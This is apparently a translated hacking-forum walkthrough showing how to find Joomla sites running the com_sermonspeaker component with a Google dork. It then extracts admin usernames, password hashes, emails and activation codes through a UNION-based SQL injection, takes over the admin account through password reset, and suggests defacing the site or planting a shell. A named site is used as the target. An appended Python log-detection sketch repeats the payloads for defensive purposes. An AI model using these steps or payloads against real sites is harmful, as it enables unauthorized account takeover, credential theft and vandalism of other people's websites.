OK, let's get straight to the walkthrough.
==================================
Code:
* Dork : inurl:option=com_sermonspeaker
Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

1. First, look for a target on Google.
Dork : inurl:option=com_sermonspeaker
2. Once you have found a target, try applying the exploit. This time our target is http://loichung.com
![[Image: 1.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/1.jpg)
3. Apply the exploit straight away
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
![[Image: 2-1.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/2-1.jpg)
4. The username, email and password all come out. Anyone who wants to encrypt the password is welcome to. This time, though, we will use the forgotten-password technique.
Code:
/index.php?option=com_user&view=reset
Just enter the admin's email
![[Image: 3.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/3.jpg)
5. Then press submit and this will appear
![[Image: 4.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/4.jpg)
It asks for an activation code, so what now?
No worries, let's go and find the activation code.
Add ,0x3a,activation after 0x3a,email so that it looks like this
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
Once ,0x3a,activation has been added after 0x3a,email, this will appear
![[Image: 5.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/5.jpg)
The activation code is now displayed, so all that is left is to paste it in
![[Image: 6.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/6.jpg)
6. Now press submit again and this will appear
![[Image: 7.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/7.jpg)
Now enter a new password of our choosing. After that, press submit again
![[Image: 8.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/8.jpg)
7. Now we log in as admin through
Code:
http://[site]/[path]/administrator
![[Image: 9.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/9.jpg)
Enter the admin username and the admin password.
![[Image: 10.jpg]](http://i1209.photobucket.com/albums/cc394/teguhmicro/10.jpg)
And now we have successfully logged in as Super Administrator and are entitled to do anything on the site. From here on, continue as you see fit.
Whether you want to
* Deface the index
* Plant a shell
* Etc.
For friends who have trouble finding a target, here are targets + the exploit
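Seen from the server side, the chain in steps 3 to 5 leaves a recognisable trail in the web access log: a `com_sermonspeaker` request whose `id` is not a plain number, followed by a `com_user` reset request from the same client. The detection sketch below is an added example, not part of the original post; the log lines are constructed, and the combined log format, the rule names and the all-digits `id` check are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the page); client IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/ HTTP/1.1" 200 6011
203.0.113.9 - - [01/Jan/2024:10:03:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4300
198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4300
192.0.2.44 - - [01/Jan/2024:10:06:00 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fconcat(username,0x3a,password,0x3a,email,0x3a,activation)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users%2F%2A%2A%2F HTTP/1.1" 200 6100
198.51.100.23 - - [01/Jan/2024:10:07:00 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=12%27 HTTP/1.1" 500 310
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.S)


def normalize(value):
    """Lower-case and turn inline SQL comments (the /**/ spacers) into spaces."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).lower()


def analyze(log_text):
    """Return (client, rule) findings for the request chain described in the walkthrough."""
    findings, suspects = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are compared in decoded form
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        option = query.get("option", [""])[0]
        if option == "com_sermonspeaker" and "id" in query:
            raw_id = query["id"][0]
            if re.fullmatch(r"[0-9]+", raw_id):
                continue  # assumed legitimate shape: a plain numeric sermon id
            rule = "union_select" if UNION_SELECT.search(normalize(raw_id)) else "non_integer_id"
            findings.append((client, rule))
            suspects.add(client)
        elif option == "com_user" and query.get("view") == ["reset"] and client in suspects:
            findings.append((client, "reset_after_sqli"))
    return findings


if __name__ == "__main__":
    for client, rule in analyze(SAMPLE_LOG):
        print(client, rule)
```

Detection only shows that the chain was attempted; the fix belongs in the component, which must treat `id` as an integer or bind it as a query parameter instead of concatenating it into the SQL statement.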